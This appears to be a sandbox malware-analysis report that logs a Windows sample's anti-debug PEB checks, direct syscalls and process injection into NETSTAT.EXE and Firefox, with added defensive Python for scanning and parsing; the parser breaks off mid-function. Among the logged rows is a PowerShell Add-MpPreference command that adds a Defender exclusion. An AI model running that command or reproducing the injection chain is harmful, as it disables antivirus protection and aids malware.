            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015F260B mov eax, dword ptr fs:[00000030h]4_2_015F260B
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E609 mov eax, dword ptr fs:[00000030h]4_2_0165E609
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E262C mov eax, dword ptr fs:[00000030h]4_2_015E262C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015FE627 mov eax, dword ptr fs:[00000030h]4_2_015FE627
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01622619 mov eax, dword ptr fs:[00000030h]4_2_01622619
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0165E6F2 mov eax, dword ptr fs:[00000030h]4_2_0165E6F2
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016606F1 mov eax, dword ptr fs:[00000030h]4_2_016606F1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016606F1 mov eax, dword ptr fs:[00000030h]4_2_016606F1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0161A6C7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161A6C7 mov eax, dword ptr fs:[00000030h]4_2_0161A6C7
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0161C6A6 mov eax, dword ptr fs:[00000030h]4_2_0161C6A6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4690 mov eax, dword ptr fs:[00000030h]4_2_015E4690
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_015E4690 mov eax, dword ptr fs:[00000030h]4_2_015E4690
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_016166B0 mov eax, dword ptr fs:[00000030h]4_2_016166B0
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01606962 mov eax, dword ptr fs:[00000030h]4_2_01606962
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov eax, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov edx, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_0162096E mov eax, dword ptr fs:[00000030h]4_2_0162096E
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684978 mov eax, dword ptr fs:[00000030h]4_2_01684978
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exeCode function: 4_2_01684978 mov eax, dword ptr fs:[00000030h]4_2_01684978
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166C97C | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01660946 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016B4940 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015D8918 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166892A | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0167892B | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0165E908 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166C912 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166E9E0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015EA9D0 | mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016129F9 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016769C0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016149D0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016AA9D3 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016689B3 | mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016689B3 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E09AD | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015F29A0 | mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E4859 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166E872 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01676870 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015F2840 | mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01610854 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161A830 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0168483A | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01602835 | mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01602835 | mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166C810 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016AA8E4 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161C8F9 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0160E8C0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016B08C0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E0887 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166C89D | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015D8B50 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01694B4B | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015DCB7E | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01676B40 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016AAB40 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01688B42 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0168EB50 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016B2B57 | mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0160EB20 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016A8B28 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_016B4B00 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0165EB1D | mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E0BCD | mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166CBF0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0160EBFC | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01600BCB | mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E8BF0 | mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0168EBD0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01694BB0 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015F0BBE | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015F0A5B | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0168EA60 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161CA6F | mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E6A50 | mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0165CA72 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161CA24 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0160EA2E | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01604A35 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161CA38 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0166CA11 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E0AD0 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0161AAEE | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01636ACC | mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01614AD0 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_01636AA4 | mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015EEA80 | mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Memory allocated: page read and write | page guard
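Every `mov <reg>, dword ptr fs:[00000030h]` above loads the PEB pointer (in 32-bit Windows the TEB is at fs:[0x18] and its PEB pointer at fs:[0x30]); anti-debug code then reads PEB+0x02 (BeingDebugged) or PEB+0x68 (NtGlobalFlag), and loader-style code reads PEB+0x0C (Ldr). The Python scanner below is an added example, not part of the Joe Sandbox report or of the sample: it finds the instruction encodings the report lists (the `64 A1` short form for eax and the `64 8B /r` form for any other register) in a raw 32-bit code buffer and names the PEB field the next instruction reads. The input bytes are constructed for the example. It is a byte-pattern scan, not a disassembler, so a hit in the middle of another instruction or in data is possible; confirm hits in a disassembler before drawing conclusions.

```python
from typing import List, Optional, Tuple

# Win32 (x86) PEB fields that anti-analysis code typically reads right after
# loading the PEB pointer. Offsets are the stable 32-bit PEB layout; x64 code
# loads the PEB from gs:[0x60] and uses different offsets, which this scanner
# deliberately does not cover.
PEB_FIELDS_X86 = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x68: "NtGlobalFlag",
}

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def _modrm(b: int) -> Tuple[int, int, int]:
    """Split a ModRM byte into (mod, reg, rm)."""
    return b >> 6, (b >> 3) & 7, b & 7


def match_peb_load(buf: bytes, i: int) -> Optional[Tuple[int, int]]:
    """If buf[i:] encodes `mov r32, dword ptr fs:[30h]`, return (length, reg index)."""
    if buf[i] != 0x64:  # FS segment-override prefix
        return None
    # eax short form (what the report shows most): 64 A1 <moffs32 = 30 00 00 00>
    if buf[i + 1:i + 6] == b"\xa1\x30\x00\x00\x00":
        return 6, 0
    # general form: 64 8B <ModRM mod=00 rm=101> <disp32 = 30 00 00 00>
    if buf[i + 1] == 0x8B and i + 7 <= len(buf):
        mod, reg, rm = _modrm(buf[i + 2])
        if mod == 0 and rm == 5 and buf[i + 3:i + 7] == b"\x30\x00\x00\x00":
            return 7, reg
    return None


def classify_followup(buf: bytes, i: int, reg: int) -> Optional[str]:
    """Name the PEB field if the instruction at buf[i:] reads [reg + disp8] with a
    known offset. esp (4) as a base needs a SIB byte and is not handled."""
    if reg == 4 or i >= len(buf):
        return None
    if buf[i] == 0x8B and i + 3 <= len(buf):                # mov r32, [reg+disp8]
        mod, _, rm = _modrm(buf[i + 1])
        if mod == 1 and rm == reg:
            return PEB_FIELDS_X86.get(buf[i + 2])
    if buf[i:i + 2] == b"\x0f\xb6" and i + 4 <= len(buf):  # movzx r32, byte ptr [reg+disp8]
        mod, _, rm = _modrm(buf[i + 2])
        if mod == 1 and rm == reg:
            return PEB_FIELDS_X86.get(buf[i + 3])
    if buf[i] == 0x80 and i + 4 <= len(buf):                # cmp byte ptr [reg+disp8], imm8
        mod, op, rm = _modrm(buf[i + 1])
        if mod == 1 and op == 7 and rm == reg:
            return PEB_FIELDS_X86.get(buf[i + 2])
    return None


def scan_peb_reads(buf: bytes) -> List[Tuple[int, str, Optional[str]]]:
    """Return (offset, destination register, PEB field or None) for each fs:[30h] load."""
    hits, i = [], 0
    while i + 6 <= len(buf):
        m = match_peb_load(buf, i)
        if m is None:
            i += 1
            continue
        length, reg = m
        hits.append((i, REG32[reg], classify_followup(buf, i + length, reg)))
        i += length
    return hits


# Constructed sample (not bytes from the analysed binary): three PEB loads in the
# register forms the report lists (eax, ecx, esi), each followed by a typical field read.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"                 # push ebp ; mov ebp, esp
    "64 A1 30 00 00 00"        # mov eax, dword ptr fs:[30h]
    "0F B6 40 02"              # movzx eax, byte ptr [eax+2]   -> BeingDebugged
    "85 C0"                    # test eax, eax
    "64 8B 0D 30 00 00 00"     # mov ecx, dword ptr fs:[30h]
    "8B 41 68"                 # mov eax, dword ptr [ecx+68h]  -> NtGlobalFlag
    "25 70 00 00 00"           # and eax, 70h (heap debug flags)
    "64 8B 35 30 00 00 00"     # mov esi, dword ptr fs:[30h]
    "8B 46 0C"                 # mov eax, dword ptr [esi+0Ch]  -> Ldr
    "C9 C3"                    # leave ; ret
)

if __name__ == "__main__":
    for off, reg, fld in scan_peb_reads(SAMPLE_CODE):
        print(f"+0x{off:04x}: mov {reg}, fs:[30h]  ->  {fld or 'unclassified use'}")
```

On the constructed buffer the scanner reports three loads at offsets 3, 15 and 30 and classifies them as BeingDebugged, NtGlobalFlag and Ldr reads; a bare `fs:[18h]` TEB load is not reported, and a PEB load whose next instruction is not a recognised field access is reported with no classification.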

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtTerminateThread: Direct from: 0x77542FCC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtAllocateVirtualMemory: Direct from: 0x77542BFC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtReadFile: Direct from: 0x77542ADC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtQuerySystemInformation: Direct from: 0x77542DFC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtResumeThread: Direct from: 0x775436AC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtNotifyChangeKey: Direct from: 0x77543C2C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtCreateMutant: Direct from: 0x775435CC
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtWriteVirtualMemory: Direct from: 0x77542E3C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | NtMapViewOfSection: Direct from: 0x77542D1C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Section loaded: NULL | target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | protection: execute and read and write
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\NETSTAT.EXE | protection: execute and read and write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL | target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | protection: read write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL | target: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | protection: execute and read and write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: read write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: execute and read and write
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 7984
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread APC queued: target process: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Process created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
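The evasion section mixes three kinds of rows: PEB loads per code function, Nt* calls made directly rather than through the exported ntdll stub ("Direct from: 0x..."), and the process relationships (sections mapped into another process, and processes created). The Python below is an added example, not part of the Joe Sandbox report: it parses rows in the report's rendered form (fused cells, trailing "Jump to behavior" link text; " | " separators are also tolerated) into per-function PEB-load counts, per-API direct-syscall counts, parent-to-child edges tagged "injected" or "created", and any Defender exclusion added via `Add-MpPreference`, so the chain NU1aAbSmCr.exe to mCFHCvdrqdDiDT.exe to NETSTAT.EXE to firefox.exe can be read off instead of hunted through the list. The embedded rows are copied from this report (a subset, so the counts below are for the subset); the function and field names are mine.

```python
import ntpath
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Tuple

# Cells in the rendered report are either fused ("...exeCode function:") or,
# in a cleaned-up copy, separated by " | "; SEP accepts both.
SEP = r"\s*\|?\s*"
RE_PEB = re.compile(r"^Source: (?P<src>.+?)" + SEP + r"Code function: (?P<fn>\w+)" + SEP
                    + r"mov (?P<reg>e[a-z]{2}), dword ptr fs:\[00000030h\]")
RE_SYSCALL = re.compile(r"^Source: (?P<src>.+?)" + SEP
                        + r"(?P<api>Nt[A-Za-z]+): Direct from: (?P<addr>0x[0-9A-Fa-f]+)$")
RE_CREATED = re.compile(r'^Source: (?P<parent>.+?)' + SEP
                        + r'Process created: (?P<child>.+?\.exe) (?P<cmd>".*)$', re.I)
RE_SECTION = re.compile(r"^Source: (?P<src>.+?)" + SEP + r"Section loaded: NULL" + SEP
                        + r"target: (?P<target>.+?)" + SEP + r"protection: (?P<prot>.+)$")
RE_EXCLUSION = re.compile(r'Add-MpPreference\s+-Exclusion(?P<kind>\w+)\s+"(?P<value>[^"]+)"')


@dataclass
class Summary:
    peb_reads: Counter = field(default_factory=Counter)        # code function -> fs:[30h] loads
    direct_syscalls: Counter = field(default_factory=Counter)  # Nt* API -> direct invocations
    edges: List[Tuple[str, str, str]] = field(default_factory=list)  # (kind, parent, child) basenames
    defender_exclusions: List[Tuple[str, str]] = field(default_factory=list)  # (kind, value)
    other: List[str] = field(default_factory=list)             # rows no pattern matched


def parse_report_rows(rows) -> Summary:
    s = Summary()
    for raw in rows:
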